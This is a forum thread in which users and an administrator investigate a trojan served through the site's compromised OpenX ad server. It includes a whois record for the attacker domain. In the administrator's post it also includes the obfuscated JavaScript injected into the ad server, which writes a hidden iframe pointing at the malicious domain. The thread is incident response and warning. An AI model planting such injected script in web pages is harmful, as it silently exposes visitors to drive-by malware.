Originally posted by Zippy
View Post
-
I did see three little windows which looked a bit like the default player installed on this machine (which I never use). They disappeared when I started killing unrecognised processes. Also manually removed cookies.Originally posted by minestrone View Post
So does the congregation think the intention was to sell us some low-grade porn?
Anyhoo if you daffodils are listening, I do my super-secret stuff on one of our other machines.Leave a comment:
-
Yup, small dialog I never noiced on the screen "unable to open sex.avi" (was remoting into the machine)Originally posted by minestrone View Post
Anyway, I just don't think what they tried will work, unless you have been mucking about with the plugin security setting and did not know what you were doing, they might get a few first year CS student I suppose (or a few Bobs )Leave a comment:
-
Good stuff, glad no-one so far seems to have been hit badly with it. Must say, as Trojans go it was a bit of a wimpy one. Luckily. Will certainly be keeping on top on OpenX updates. Seen quite a few sites over the last few days hit with it so if you have any unpatched sites running OpenX then sort it quickly!Leave a comment:
-
I noticed the java plugin kick off last night and was not sure why, machine is still on in the house.
It's fully patched and up to date with windows security essentials though, should be fine.Leave a comment:
-
NOD32 went ape tulip last night and kept blocking bilsen url. Just ran a scan and nothing so pretty happy.Leave a comment:
-
-
I don't remember what time I was on CUK last night. Any chance admin might be able to find a list of logged-in users in the danger period and contact them all - other users might have made an infrequent visit and not see this thread.
Is this trojan browser-specific? And I assume it targets Windows alone?Leave a comment:
-
Just checked with an HTTP debugger and, even when I allow the ads through, nothing untoward is showing up now
Of note is that, when searching for blivvsen.com, this thread is currently the only content that appears on a Google search except for some robot that tracks new domain registrations.
The whois record for that domain is:
"Registrar: Internet.bs Corp"... lots of BS from their end, it seemsCode:Domain blivvsen.com Date Registered: 2010-9-16 Date Modified: 2010-9-17 Expiry Date: 2011-9-16 DNS1: ns1.blivvsen.com DNS2: ns2.blivvsen.com Registrant Private Whois Service Private Whois Service lj371hp4c91e42b57a56@db4lf1v4c7e2571db075.privatewhois.net *******PLEASE DO NOT SEND LETTERS****** ****Contact the owner by email only**** c/o blivvsen.com N4892 Nassau Bahamas Administrative Contact Private Whois Service Private Whois Service d4xk8fg4c91e42b6c24e@db4lf1v4c7e2571db075.privatewhois.net *******PLEASE DO NOT SEND LETTERS****** ****Contact the owner by email only**** c/o blivvsen.com N4892 Nassau Bahamas Tel: +852.81720004 Technical Contact Private Whois Service Private Whois Service zasauyb4c91e42b64174@db4lf1v4c7e2571db075.privatewhois.net *******PLEASE DO NOT SEND LETTERS****** ****Contact the owner by email only**** c/o blivvsen.com N4892 Nassau Bahamas Tel: +852.81720004 Registrar: Internet.bs Corp. Registrar's Website : <a href='http://www.internetbs.net/'>http://www.internetbs.net/</a>
Last edited by NickFitz; 21 September 2010, 02:11.Leave a comment:
-
Someone else I owe drinks to at the next meet up thenOriginally posted by Zippy View Post
I don't feel particularly clever at the minute, should have turned the ad server off as soon as people started complaining. I did upgrade the adserver last night but not to the most recent.Originally posted by blacjac View PostNice one administrator
I have just had a look around the OpenX site and can't see where I could have downloaded that version of the software from.Code:root@cukmain:~/openx/20100919# ls -al total 159984 drwxr-xr-x 3 root root 4096 Sep 19 22:18 . drwxr-xr-x 6 root root 4096 Sep 21 01:39 .. -rw-r--r-- 1 root root 154185110 Sep 19 21:59 cukopenx.sql drwxr-xr-x 10 500 500 4096 Sep 19 22:04 openx-2.8.0 -rw-r--r-- 1 root root 9452354 Apr 29 2009 openx-2.8.0.tar.gz
Think must have been a link in the control panel, just upgraded and moved on to the next site. Got distracted though as the next site I went to patch had already been had.
Still, at least no-one else will get had when the forum and main site (adserver covers the main site too) gets busier in the morning.
Thanks to you all for letting me know and helping track it down. Apologies again to the infected, hope it is no more than an AV clean up job for you and no system rebuilds needed...Leave a comment:
-
Don't worry. If the little bastard has got me I'll sort it.Originally posted by administrator View PostSend me the invoice if you have to pay for it...
I did the free trial of Kaspersky as Owlhoot said it was warning him of problems, they do a free trial
Did the updates and quick scan showing nothing and full scan showing no problems so far either.
Pig tulip. Found the problem. Is the adserver:
The append table of the adserver is full of this but don't understand why this wasn't showing in the source when I was viewing it. Maybe as it had tried to infect me but browser was beyond the hack so it then hid it from me?Code:<script language="JavaScript">var dc=document; var date_ob=new Date(); dc.cookie='h1=o; path=/;';if(dc.cookie.indexOf('3=llo') <= 0 && dc.cookie.indexOf('1=o') > 0){\ function clng(wrd){var cou=new Array('en-us','en-ca','en-au','en-gb','fr-ca','fr','de','es','it');for(i=0;i<cou.length;i++){if(wrd==cou[i])return true;}return false;}\ if(typeof navigator.language == 'undefined'){var nav = navigator.userLanguage} else {var nav = navigator.language;}\ if(typeof run == 'undefined'&&clng(nav.toLowerCase())){dc.writeln("<script type=\\"text/javascript\\"><!--");dc.writeln("var host=' widt'+'h=1 h'+'eight'+'=1 '; var src='src='; var brdr='fra'+'mebor'+'der='+'0';var sc='\\"http://blivvsen. com/shuffle/index.php?s=IBB@G\\" ';");dc.writeln("document.write('<ifr'+'ame'+host+src+sc+brdr+'\\"></ifra'+'me>');");dc.writeln("//--><\\/script>");} var run=1;\ date_ob.setTime(date_ob.getTime()+86400000);dc.cookie='h3=llo; path=/; expires='+date_ob.toGMTString();}</script>
Sorry all, very disappointed with myself for not spotting sooner.Leave a comment:
-
Might have inline images on this forum turned off. Will check once sorted the adserver DB out.Originally posted by blacjac View PostLeave a comment:
Leave a comment: